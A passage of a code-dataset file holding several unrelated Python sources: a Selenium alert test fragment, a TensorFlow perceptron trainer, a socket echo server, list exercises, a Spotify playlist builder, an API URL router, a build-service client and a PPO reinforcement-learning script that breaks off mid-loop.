Selenium')\")\nt.sleep(5)\nbrowser.switch_to.alert.dismiss()\nt.sleep(2)\nbrowser.quit()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"4070235","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd \n\n############################## PRE-TRAINING ##############################\ndef split_data(X,Y,length=0.8):\n\tl = int(len(Y)*length)\n\txtr, ytr = X[:l],pd.get_dummies(Y[:l])\n\txte, yte = X[l:],pd.get_dummies(Y[l:])\n\treturn xtr,ytr,xte,yte\n\ndef next_batch(x,y,i,batchSize):\n\tif i == 0:\n\t\txbs, ybs = x[:batchSize], y[:batchSize]\n\telse:\n\t\ts = i*batchSize\n\t\te = s+batchSize+1\n\t\tif e > len(x):\n\t\t\txbs, ybs = x[s:], y[s:]\n\t\telse:\n\t\t\txbs, ybs = x[s:e], y[s:e]\n\treturn xbs,ybs\n\n############################## TRAINING ##############################\n# Generate the weights and biases for each layer \ndef create_weights_biases(n_input,n_classes,feature=256,h=2):\n\tweight,biases={},{}\n\tfor i in range(1,h+1):\n\t\tif i == 1:\n\t\t\tweight.update({'h'+str(i):tf.Variable(tf.random_normal([n_input,feature]))})\n\t\t\tbiases.update({'h'+str(i):tf.Variable(tf.random_normal([feature]))})\n\t\telse:\n\t\t\tweight.update({'h'+str(i):tf.Variable(tf.random_normal([feature,feature]))})\n\t\t\tbiases.update({'h'+str(i):tf.Variable(tf.random_normal([feature]))})\n\tweight.update({'out':tf.Variable(tf.random_normal([feature,n_classes]))})\n\tbiases.update({'out':tf.Variable(tf.random_normal([n_classes]))})\n\treturn weight,biases\n\n# Create multilayer perceptron with N hidden layer\ndef multilayer_perceptron(x, weights, biases, dropout):\n\tlayer = len(weights.keys())\n\thidden_layer = None\n\t# hidden layer with RELU activation\n\tfor i in range(1,layer):\n\t\tname = 'h'+str(i)\n\t\tif i == 1:\n\t\t\thidden_layer = tf.add(tf.matmul(x,weights[name]),biases[name])\n\t\telse:\n\t\t\thidden_layer = tf.add(tf.matmul(hidden_layer,weights[name]),biases[name])\n\t\thidden_layer = tf.nn.relu(hidden_layer)\n\t\thidden_layer = tf.nn.dropout(hidden_layer, dropout)\n\t# Output layer with linear activation\n\treturn tf.matmul(hidden_layer, weights['out']) + biases['out']\n\n# Creating the train session\n# dp - dropout, f - features in hidden layer, h - hidden layer, lr - learning rate, \n# e_acc - expected accuracy, tp - total epoch, bs - batch size, ds - display step, \n# rdn - random sampling, end - to end cycle, load - load save model\ndef train_session(X,Y,n_input,n_classes,dp=.75,f=256,\n\t\t\t\t h=2,lr=0.001,e_acc=.75,tp=10,bs=10,ds=1,\n\t\t\t\t rdn=1.,end=200,load=False):\n\t# Spliting the data set into train and test\n\ttrain_x,train_y,test_x,test_y=split_data(X,Y)\n\tsample = int(len(train_x)*rdn)\n\t# Placeholder for x,y\n\tx = tf.placeholder(tf.float32,[None,n_input])\n\ty = tf.placeholder(tf.float32,[None,n_classes])\n\tkeep_prob = tf.placeholder(tf.float32)\n\t# Create the weights and biases\n\tweights, biases = create_weights_biases(n_input,n_classes,feature=f,h=h)\n\t\n\tpred = multilayer_perceptron(x,weights,biases,keep_prob)\n\t# loss function\n\tcost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t labels=y))\n\t# optimizing function and minimizing with the loss funciton\n\toptimizer = tf.train.AdamOptimizer(learning_rate=lr).minimize(cost)\n\t#Test Model\n\tcorrect_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y,1))\n\t# Calculate accuracy\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float'))\n\t\n\tinit = tf.global_variables_initializer()\n\n\tsaver = tf.train.Saver()\n\t\n\t# Initializing the variables\n\twith tf.Session() as sess:\n\t\tsess.run(init)\n\t\t# Load a save model\n\t\tif load:\n\t\t\tsaver = tf.train.import_meta_graph('model/model.meta')\n\t\t\tsaver.restore(sess, 'model/model')\n\t\t\tprint ('Model Loaded')\n\n\t\tprint ('Starting Training Session')\n\t\t#training cycle\n\t\ttotal_acc = []\n\t\tt_acc = 0.\n\t\tepoch = 0\n\t\twhile True:\n\t\t\tif rdn < 1:\n\t\t\t\tind = train_x.sample(n=sample).index\n\t\t\t\tx_sam = train_x.loc[ind].reset_index(drop=True)\n\t\t\t\ty_sam = train_y.loc[ind].reset_index(drop=True)\n\t\t\telse:\n\t\t\t\tx_sam,y_sam = train_x,train_y\n\t\t\ttotal_batch = int(len(x_sam)/bs)\n\t\t\t#loop over all batch \n\t\t\tfor i in range(total_batch):\n\t\t\t\tbatch_x, batch_y = next_batch(x_sam,y_sam,i,bs)\n\t\t\t\t# Run optimization op (backprop) \n\t\t\t\tsess.run(optimizer,feed_dict={x:batch_x,y:batch_y,keep_prob:dp})\n\t\t\tif epoch % ds == 0:\n\t\t\t\t# calculate batch loss and accuracy\n\t\t\t\tloss, acc = sess.run([cost,accuracy],feed_dict={x:batch_x,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ty:batch_y,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tkeep_prob:1.})\n\t\t\t\ttotal_acc.append(acc)\n\t\t\t\tprint ('Epoch:', '%04d'%(epoch+1),'Loss =', \n\t\t\t\t\t '{:.6f}'.format(loss),\n\t\t\t\t\t 'Accuracy =','{:.5f}'.format(acc))\n\t\t\tif epoch > tp and epoch % tp == 0:\n\t\t\t\tt_acc = np.mean(np.array(total_acc))\n\t\t\t\tif t_acc > e_acc:\n\t\t\t\t\tbreak\n\t\t\tif epoch >= end:\n\t\t\t\tbreak\n\t\t\tepoch += 1\n\t\tprint ('Optimization Finished')\n\t\tprint ('Accuracy:', accuracy.eval({x: test_x, y: test_y, keep_prob: 1.}))\n\t\t# Saving the model\n\t\tif not os.path.exists('model'):\n\t\t\tos.makedirs('model')\n\t\tsaver.save(sess, 'model/model')\n\t\tprint ('Model Saved')\n","sub_path":"tf_multi_perceptron.py","file_name":"tf_multi_perceptron.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"204781190","text":"\n#\n# Directions\n# \nDIR_NONE = 0\nDIR_RIGHT = 1\nDIR_LEFT = 2\n#\n# Section states\n#\nSECTION_EMPTY = 0\nSECTION_BLOCKED = 1\nSECTION_BOOKED = 2\nSECTION_CLEAR = 3\nSECTION_OCCUPIED = 4\nSECTION_STOPPING = 5\nSECTION_CONTINUING = 6\nSECTION_STARTING = 7\nSECTION_STOPPED = 8\nSECTION_LEAVING = 9\nSECTION_TERMINATING = 10\nSECTION_TERMINATED = 11\nSECTION_BASE_LAST = 12\n\n","sub_path":"symbols.py","file_name":"symbols.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"406943434","text":"import socket\nimport os\nfrom _thread import*\n\ns = socket.socket()\nhost=''\nport =8889\nThreadCount=0\ntry:\n\ts.bind((host,port))\nexcept socket.error as e:\n\tprint(str(e))\n\nprint(\"Waiting for connection...\")\ns.listen(5)\n\ndef threaded_client(connection):\n\tconnection.send(str.encode(\"Welcome Genshin Global server\\n\"))\n\twhile True:\n\t\tdata = connection.recv(2048)\n\t\treply = \"Server said: \"+data.decode('utf-8')\n\t\tif not data:\n\t\t\tbreak\n\t\tconnection.sendall(str.encode(reply))\n\tconnection.close()\n\nwhile True:\n\tClient, address = s.accept()\n\tprint(\"Connected to: \"+address[0]+\":\"+str(address[1]))\n\tstart_new_thread(threaded_client,(Client,))\n\tThreadCount+=1\n\tprint(\"Thread Number: \"+str(ThreadCount))\ns.close()\n","sub_path":"5.2.py","file_name":"5.2.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"335515246","text":"'''\nproblem 1\n'''\n#函數 prList(arr), 輸入值 arr 是一個 list, 將其中每個元素印出, 用逗號分隔\n#例如: prList([10, 20, 30, 40, 50]) 印出 10, 20, 30, 40, 50\n\na = [10,20,30,40,50]\ndef prList(arr):\n #index is last one , then println. otherwise,\",\"\n for idx,el in enumerate(arr):\n if (idx != len(arr)-1):\n print(el,end=\",\")\n else:\n print(el)\nb = [30,4,56]\nprint(prList(a))\nprint(prList(b))\n\n'''\nprob 2\n'''\n#函數 enumList(arr), 輸入值 arr 是一個 list, 請將其中每個元素分行印出, 並在那一行的最前面加上編號.\n#例如: enumList(['apple', 'orange', 'banana']) 會印出:\n#1. apple\n#2. orange\n#3. banana\ndef enumList(arr):\n for idx,el in enumerate(arr):\n print(idx+1,'. ',el)\nenumList(['apple', 'orange', 'banana'])\n\n# we can also use 'Format' !!\ndef enumList2(arr):\n for idx,el in enumerate(arr):\n print(\"{}. {}\".format(idx+1,el))\nenumList2(['apple','orange','banana'])","sub_path":"list_enumerate.py","file_name":"list_enumerate.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"354864717","text":"import logging\nimport os\nfrom typing import List\n\nimport requests\nfrom google.cloud import bigquery\n\nfrom playlist_maker.auto_playlists import AutoPlaylist\nfrom playlist_maker.tokenito import get_token\nfrom playlist_maker.types import NotifierMessage\n\nlogger = logging.getLogger(__name__)\n\n\nclass LatestReleases(AutoPlaylist):\n def get_tracks(self):\n query = \"\"\"\n SELECT a.artist_id, a.latest_release_date , a.latest_release_uri \n FROM `rapsodie.rapsodie_main.spotify_artist_page` a\n INNER JOIN (\n SELECT artist_id, max(latest_release_date) latest_release_date\n FROM `rapsodie.rapsodie_main.spotify_artist_page` \n GROUP BY artist_id\n ) b ON a.artist_id = b.artist_id AND a.latest_release_date = b.latest_release_date\n where cast(a.latest_release_date as DATE) between DATE_SUB(current_date(), INTERVAL 0 DAY) and current_date()\n order by a.latest_release_date desc\n \"\"\"\n bq_client = bigquery.Client()\n rows = bq_client.query(query).result()\n s_token = get_token()\n tracks = []\n for row in rows:\n album_id = row[2].replace(\"spotify:album:\", \"\")\n album_id = album_id.replace('\"', \"\")\n url = f\"https://api.spotify.com/v1/albums/{album_id}/tracks?country=FR&limit=50&offset=0\"\n response = requests.get(url, headers={\"Authorization\": f\"Bearer {s_token}\"})\n response_body = response.json()\n for track in response_body[\"items\"]:\n tracks.append(track[\"id\"])\n return tracks\n\n def get_announcements(self) -> List[NotifierMessage]:\n return []\n","sub_path":"playlist_maker/auto_playlists/LatestReleases.py","file_name":"LatestReleases.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"530907105","text":"# -*- coding:utf-8 -*-\r\n\"\"\"\r\nCreated on 2016-3-18\r\n\r\n@author: gaga\r\n\"\"\"\r\n\r\n\"\"\"\r\nWSGI middleware\r\n\"\"\"\r\n\r\nfrom oslo_config import cfg\r\nfrom oslo_log import log as logging\r\nimport routes\r\nfrom naas.api import wsgi as base_wsgi\r\nfrom naas.api.controller import node\r\nfrom naas.api.controller import endpoint\r\nfrom naas.api.controller import agent\r\nfrom naas.api.controller import network_type\r\nfrom naas.api.controller import tunnel\r\nfrom naas.api.controller import switch\r\nfrom naas.api.controller import task\r\nfrom naas.api.controller import other\r\n\r\n\r\nCONF = cfg.CONF\r\nLOG = logging.getLogger(__name__)\r\n\r\n\r\nclass APIMapper(routes.Mapper):\r\n def routematch(self, url=None, environ=None):\r\n if url == \"\":\r\n result = self._match(\"\", environ)\r\n return result[0], result[1]\r\n return routes.Mapper.routematch(self, url, environ)\r\n\r\n def connect(self, *args, **kargs):\r\n # NOTE(vish): Default the format part of a route to only accept json\r\n # and xml so it doesn't eat all characters after a '.'\r\n # in the url.\r\n kargs.setdefault('requirements', {})\r\n if not kargs['requirements'].get('format'):\r\n kargs['requirements']['format'] = 'json|xml'\r\n return routes.Mapper.connect(self, *args, **kargs)\r\n\r\n\r\nclass BaseRouter(base_wsgi.Router):\r\n \"\"\"Routes requests on the Naas API to the appropriate controller\r\n and method.\r\n \"\"\"\r\n ExtensionManager = None # override in subclasses\r\n\r\n @classmethod\r\n def factory(cls, global_config, **local_config):\r\n \"\"\"Simple paste factory, :class:`naas.api.wsgi.Router` doesn't have one.\"\"\"\r\n return cls()\r\n\r\n def __init__(self, ext_mgr=None, init_only=None):\r\n mapper = APIMapper()\r\n self.resources = {}\r\n self._setup_routes(mapper)\r\n super(BaseRouter, self).__init__(mapper)\r\n\r\n def _setup_routes(self, mapper):\r\n raise NotImplementedError()\r\n\r\n\r\nclass APIRouter(BaseRouter):\r\n \"\"\"Routes requests on the Naas API to the appropriate controller\r\n and method.\r\n \"\"\"\r\n\r\n def _setup_routes(self, mapper):\r\n \"\"\"\r\n url映射:\r\n 1. node:节点URL路由\r\n \"\"\"\r\n\r\n self.resources['node'] = node.create_resource()\r\n\r\n mapper.connect(\"/naas/node/list\",\r\n controller=self.resources['node'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/node/create\",\r\n controller=self.resources['node'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/node/detail/{node_id}\",\r\n controller=self.resources['node'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/node/update/{node_id}\",\r\n controller=self.resources['node'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/node/delete/{node_id}\",\r\n controller=self.resources['node'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n \"\"\"\r\n url映射:\r\n 2. endpoint:连接点URL路由\r\n \"\"\"\r\n\r\n self.resources['endpoint'] = endpoint.create_resource()\r\n\r\n mapper.connect(\"/naas/endpoint/list\",\r\n controller=self.resources['endpoint'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/endpoint/create\",\r\n controller=self.resources['endpoint'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/endpoint/detail/{endpoint_id}\",\r\n controller=self.resources['node'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/endpoint/update/{endpoint_id}\",\r\n controller=self.resources['endpoint'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/endpoint/delete/{endpoint_id}\",\r\n controller=self.resources['endpoint'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n \"\"\"\r\n url映射:\r\n 3. agent:网络代理URL路由\r\n \"\"\"\r\n\r\n self.resources['agent'] = agent.create_resource()\r\n\r\n mapper.connect(\"/naas/agent/list\",\r\n controller=self.resources['agent'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/agent/create\",\r\n controller=self.resources['agent'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/agent/delete/{agent_id}\",\r\n controller=self.resources['agent'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n mapper.connect(\"/naas/agent/update/{agent_id}\",\r\n controller=self.resources['agent'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/agent/detail/{agent_id}\",\r\n controller=self.resources['agent'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/agent/{agent_id}/tunnel_point\",\r\n controller=self.resources['agent'],\r\n action=\"tunnel_point\",\r\n conditions={\"method\": ['GET']})\r\n\r\n \"\"\"\r\n url映射:\r\n 4. tunnel:专线通道URL路由\r\n \"\"\"\r\n\r\n self.resources['tunnel'] = tunnel.create_resource()\r\n\r\n mapper.connect(\"/naas/tunnel/list\",\r\n controller=self.resources['tunnel'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/tunnel/detail/{tunnel_id}\",\r\n controller=self.resources['tunnel'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/tunnel/create\",\r\n controller=self.resources['tunnel'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/tunnel/update/{tunnel_id}\",\r\n controller=self.resources['tunnel'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/tunnel/delete/{tunnel_id}\",\r\n controller=self.resources['tunnel'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n \"\"\"\r\n url映射:\r\n 5. switch:交换机URL路由\r\n \"\"\"\r\n\r\n self.resources['switch'] = switch.create_resource()\r\n\r\n mapper.connect(\"/naas/switch/list\",\r\n controller=self.resources['switch'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/switch/create\",\r\n controller=self.resources['switch'],\r\n action=\"create\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/switch/detail/{switch_id}\",\r\n controller=self.resources['switch'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/switch/update/{switch_id}\",\r\n controller=self.resources['switch'],\r\n action=\"update\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/switch/delete/{switch_id}\",\r\n controller=self.resources['switch'],\r\n action=\"delete\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n mapper.connect(\"/naas/switch/{switch_id}/switch_port\",\r\n controller=self.resources['switch'],\r\n action=\"list_switch_port\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/switch/switch_port/create\",\r\n controller=self.resources['switch'],\r\n action=\"create_switch_port\",\r\n conditions={\"method\": ['POST']})\r\n\r\n mapper.connect(\"/naas/switch/switch_port/{switch_port_id}\",\r\n controller=self.resources['switch'],\r\n action=\"manage_switch_port\",\r\n conditions={\"method\": ['PUT']})\r\n\r\n mapper.connect(\"/naas/switch/switch_port/delete/{switch_port_id}\",\r\n controller=self.resources['switch'],\r\n action=\"delete_switch_port\",\r\n conditions={\"method\": ['DELETE']})\r\n\r\n mapper.connect(\"/naas/switch/{switch_id}/switch_port/list_unused/{switch_port_id}\",\r\n controller=self.resources['switch'],\r\n action=\"list_unused\",\r\n conditions={\"method\": ['GET']})\r\n\r\n \"\"\"\r\n url映射:\r\n 6. task:任务URL路由\r\n \"\"\"\r\n\r\n self.resources['task'] = task.create_resource()\r\n mapper.connect(\"/naas/task/list\",\r\n controller=self.resources['task'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/task/detail/{task_id}\",\r\n controller=self.resources['task'],\r\n action=\"detail\",\r\n conditions={\"method\": ['GET']})\r\n\r\n \"\"\"\r\n url映射���\r\n 7. network_type:网络类型URL路由\r\n \"\"\"\r\n\r\n self.resources['network_type'] = network_type.create_resource()\r\n\r\n mapper.connect(\"/naas/network_type/list\",\r\n controller=self.resources['network_type'],\r\n action=\"list\",\r\n conditions={\"method\": ['GET']})\r\n\r\n \"\"\"\r\n url映射:\r\n 8. other:其他功能URL路由\r\n \"\"\"\r\n\r\n self.resources['other'] = other.create_resource()\r\n\r\n mapper.connect(\"/naas/network_map\",\r\n controller=self.resources['other'],\r\n action=\"network_map\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/endpoint_plugin\",\r\n controller=self.resources['other'],\r\n action=\"endpoint_plugin\",\r\n conditions={\"method\": ['GET']})\r\n\r\n mapper.connect(\"/naas/endpoint_distance\",\r\n controller=self.resources['other'],\r\n action=\"endpoint_distance\",\r\n conditions={\"method\": ['GET']})\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"naas/api/api/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":11407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"36549343","text":"import requests\nfrom hanga.utils import TrackedFile\nfrom json import dumps\nfrom os import environ\nfrom os.path import join\n\n\nclass HangaException(Exception):\n pass\n\n\nclass HangaAPI(object):\n \"\"\"API to communicate with Hanga\"\"\"\n\n def __init__(self, key=None, url=None):\n super(HangaAPI, self).__init__()\n self._url = url or environ.get(\"HANGA_URL\", \"https://hanga.io\")\n self._key = key or environ.get(\"HANGA_API_KEY\")\n if not self._key:\n raise HangaException(\"Missing Hanga API Key\")\n if not self._url.endswith(\"/\"):\n self._url += \"/\"\n\n def submit(self, args, filename, callback=None):\n \"\"\"Submit a packaged app to build. Filename should point on a\n structured zip containing the app, buildozer.spec adjusted for it,\n and others deps if needed. Args should be the line used for building\n the app.\n\n The result is a dict that contain::\n\n {\n \"result\": \"ok\",\n \"uuid\": \"f18cafae-c730-11e3-add4-04011676f501\",\n }\n\n Or if there is a failure::\n\n {\n \"result\": \"error\",\n \"details\": \"Something bad happened\"\n }\n\n \"\"\"\n fd = None\n try:\n fd = TrackedFile(filename, callback=callback)\n params = {\"args\": dumps(args)}\n r = self._build_request(\n requests.post, \"submit\", data=fd, params=params, stream=True)\n finally:\n if fd:\n fd.close()\n\n return r.json()\n\n def download(self, uuid, dest_dir, callback=None):\n \"\"\"Download the result of a job build. If a callback is passed, it will\n be called with the size of the content received and the total size of\n the content.\n\n Return the name of the filename in the dest_dir.\n \"\"\"\n r = self._build_request(requests.get,\n \"{}/dl\".format(uuid), stream=True)\n\n # ensure the name is shared in the content-disposition\n disposition = r.headers.get(\"content-disposition\")\n if not disposition or not disposition.startswith(\"attachment;\"):\n raise HangaException(\"File not attached, nothing to download\")\n filename = disposition.split(\"filename=\", 1)[-1]\n if not filename:\n raise HangaException(\"Empty filename\")\n\n dest_fn = join(dest_dir, filename)\n index = 0\n length = int(r.headers.get(\"Content-Length\"))\n if callback:\n callback(0, length)\n with open(dest_fn, \"wb\") as fd:\n for content in r.iter_content(chunk_size=8192):\n fd.write(content)\n index += len(content)\n if callback:\n callback(index, length)\n\n return filename\n\n def status(self, uuid):\n \"\"\"Return the status of a job, in a form of a dictionary::\n\n {\n \"result\": \"ok\",\n \"job_status\": \"packaging\",\n \"job_progression\": \"78\"\n }\n\n The `result` can be either \"OK\" or \"error\" if something happens.\n The `job_status` can be a lot of things, depending on the Hanga \n version running. It ends only with a status of \"done\" or \"error\".\n \"\"\"\n r = self._build_request(requests.get, \"{}/status\".format(uuid))\n return r.json()\n\n def _build_request(self, method, path, **kwargs):\n url = \"{}api/1/{}\".format(self._url, path)\n headers = {\"X-Hanga-Api\": self._key}\n r = method(url, headers=headers, **kwargs)\n r.raise_for_status()\n return r\n","sub_path":"hanga/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"85002413","text":"\"\"\"\nusing dataset and dataloader instead of np.random.choice\nimplementation of PPO algo for MuJoCo Environment\nPaper:[62] Schulman J, Wolski F, Dhariwal P, et al. Proximal Policy Optimization Algorithms.[J]. arXiv: Learning, 2017.\n\nTODO: change to MuJoCo version\n\"\"\"\n\nimport os\nimport gym\nimport ray\nimport click\nimport torch\nimport time\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport torch.nn.functional as F\n\nfrom torch import autograd\nfrom torch.utils.data import Dataset, DataLoader\nfrom util.preprocess2015 import ProcessUnit\nfrom util.model import Policy2013, Value\nfrom util.tools import save_record\n\ncpu_device = torch.device(\"cpu\")\ndevice = cpu_device\n#device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nstorage_path = \"../results\"\nEPS = 1e-10\n\n\nclass args(object):\n FrameSkip = 4\n Gamma = 0.99\n # GAE parameter\n Lambda = 0.95\n # Horizon(train frame)\n Llocal = 128\n # Num epochs\n K = 3\n # Tmax: 40M\n Tmax = int(40e6)\n actor_number = 8 \n generation = 1000000\n # adam's stepsize 2.5 * 10^-4\n stepsize = 2.5e-4\n stepsize0 = stepsize\n # Loss hyperparameter\n c1 = 1\n c2 = 0.01\n #minibatch_size = 32*8\n minibatch_size = 32*8\n # clip parameter\n epsilon = 0.1 \n epsilon0 = epsilon\n seed = 124\n layer_norm = True\n state_norm = True\n advantage_norm = True \n lossvalue_norm = True\n\n @classmethod\n def update(cls, current_frames):\n ratio = 1 - current_frames / cls.Tmax\n cls.stepsize = cls.stepsize0 * ratio\n cls.epsilon = cls.epsilon0 * ratio\n\n\n@ray.remote\nclass Simulator(object):\n \"\"\"\n simulator can be used for training data collection and performance test.\n If you define a Simulator for training data collection, you should not use it for testing.\n \"\"\"\n def __init__(self, gamename):\n self.env = gym.make(gamename)\n #self.env.seed(args.seed)\n self.obs = self.env.reset()\n self.start = False\n self.record = {\n \"episode\":[],\n \"steps\":[],\n \"reward\":[],\n \"gamelength\":[]\n }\n self.reward = 0\n self.gamelength = 0\n\n def start_game(self, episode, steps):\n no_op_frames = np.random.randint(1,30)\n self.pu = ProcessUnit(4, args.FrameSkip)\n obs = self.env.reset()\n self.pu.step(obs)\n for i in range(no_op_frames):\n obs, r, done, _ = self.env.step(0)\n self.pu.step(obs)\n if done:\n return False\n self.start = True\n self.record['episode'].append(episode)\n self.record['steps'].append(steps)\n self.record['reward'].append(self.reward)\n self.record['gamelength'].append(self.gamelength)\n self.reward = 0\n self.gamelength = 0\n return True\n\n def get_records(self):\n return self.record\n\n def add_record(self, r):\n self.reward += r\n self.gamelength += 1\n\n def rollout(self, actor, critic, Llocal, episode, steps):\n \"\"\"\n if Llocal is None: test mission\n else: collect data\n \"\"\"\n while not self.start:\n self.start_game(episode, steps)\n if Llocal is None:\n self.start_game(episode, steps)\n\n Lmax = 108000 if Llocal is None else Llocal\n frame_list = []\n action_list = []\n done_list = []\n reward_list = []\n # the probability of choosing action at\n probability_list = []\n break_or_not = False\n reward = 0\n for i in range(Lmax):\n frame_now = self.pu.to_torch_tensor()\n # stochastic policy\n action, prob = actor.act_with_prob(frame_now)\n r_ = 0\n for j in range(args.FrameSkip):\n obs, r, done, _ = self.env.step(action)\n r_ += r\n reward += r\n self.pu.step(obs)\n\n # it's for recording\n self.add_record(r)\n \n if done:\n break_or_not = True\n break\n if Llocal is not None:\n frame_list.append(frame_now)\n action_list.append(action)\n done_list.append(0 if done else 1)\n reward_list.append(r_)\n probability_list.append(prob)\n if break_or_not:\n self.start = False\n break\n if Llocal is None:\n # for testing models\n return reward\n # for collecting data\n frame_list = frame_list[::-1]\n action_list = action_list[::-1]\n reward_list = reward_list[::-1]\n probability_list = probability_list[::-1]\n done_list = done_list[::-1]\n # value's output\n value_list = []\n for idx, frame in enumerate(frame_list):\n value_list.append(critic(frame))\n\n delta_list = []\n advantage_list = []\n Value_target_list = []\n # previous discounted return\n prev_return = 0\n prev_value = 0\n prev_advantage = 0\n\n for i in range(len(reward_list)):\n Value_target_list.append(reward_list[i]+args.Gamma*prev_return*done_list[i])\n delta_list.append(reward_list[i]+args.Gamma*prev_value*done_list[i]-value_list[i])\n assert delta_list[i] == delta_list[-1]\n advantage_list.append(delta_list[i] + args.Gamma*args.Lambda*prev_advantage*done_list[i])\n\n prev_return = Value_target_list[i]\n prev_value = value_list[i]\n prev_advantage = advantage_list[i]\n\n # if args.advantage_norm:\n # mb_advan = (mb_advan - mb_advan.mean()) / (mb_advan.std() + EPS)\n return [frame_list, action_list, probability_list, advantage_list, Value_target_list]\n\n\nclass RLDataset(Dataset):\n \"\"\"\n dataset for RL data:\n\n 1. state\n 2. action\n 3. action probability\n 4. advantage estimator\n 5. target value(critic)\n ...\n \"\"\"\n def __init__(self, data_list):\n super(RLDataset, self).__init__()\n self.data_list = data_list\n # the element of data_list should be torch.Tensor\n self.length = self.data_list[0].shape[0]\n\n def __getitem__(self, i):\n return [d[i] for d in self.data_list]\n\n def __len__(self):\n return self.length\n\n@click.command()\n@click.option(\"--gamename\")\ndef main(gamename):\n start_time = time.time()\n env = gym.make(gamename)\n action_n = env.action_space.n\n critic = Value().to(device)\n actor = Policy2013(action_n).to(device)\n simulators = [Simulator.remote(gamename) for i in range(args.actor_number)]\n\n actor_optm = torch.optim.Adam(actor.parameters(), lr=args.stepsize)\n critic_optm = torch.optim.Adam(critic.parameters(), lr=args.stepsize)\n\n frame_count = 0\n\n for g in range(args.generation):\n # train simulator and test simulator will not use the same variable\n rollout_ids = [s.rollout.remote(actor.to(cpu_device), critic.to(cpu_device), args.Llocal, g, frame_count) for s in simulators]\n frame_list = []\n action_list = []\n prob_list = []\n advantage_list = []\n value_list = []\n \n for rollout_id in rollout_ids:\n rollout = ray.get(rollout_id)\n frame_list.extend(rollout[0])\n action_list.extend(rollout[1])\n prob_list.extend(rollout[2])\n advantage_list.extend(rollout[3])\n value_list.extend(rollout[4])\n\n actor.to(device)\n critic.to(device)\n batch_size = len(advantage_list)\n frame_t = torch.cat(frame_list)\n action_t = torch.Tensor(action_list).long()\n prob_t = torch.Tensor(prob_list).float()\n advantage_t = torch.Tensor(advantage_list).float()\n critic_target = torch.Tensor(value_list).float()\n\n if args.advantage_norm:\n advantage_t = (advantage_t - advantage_t.mean())/(advantage_t.std() + EPS)\n\n dataset = RLDataset([frame_t, action_t, prob_t, advantage_t, critic_target])\n dataloader = DataLoader(dataset, batch_size=args.minibatch_size, shuffle=True, num_workers=4)\n for batch_idx in 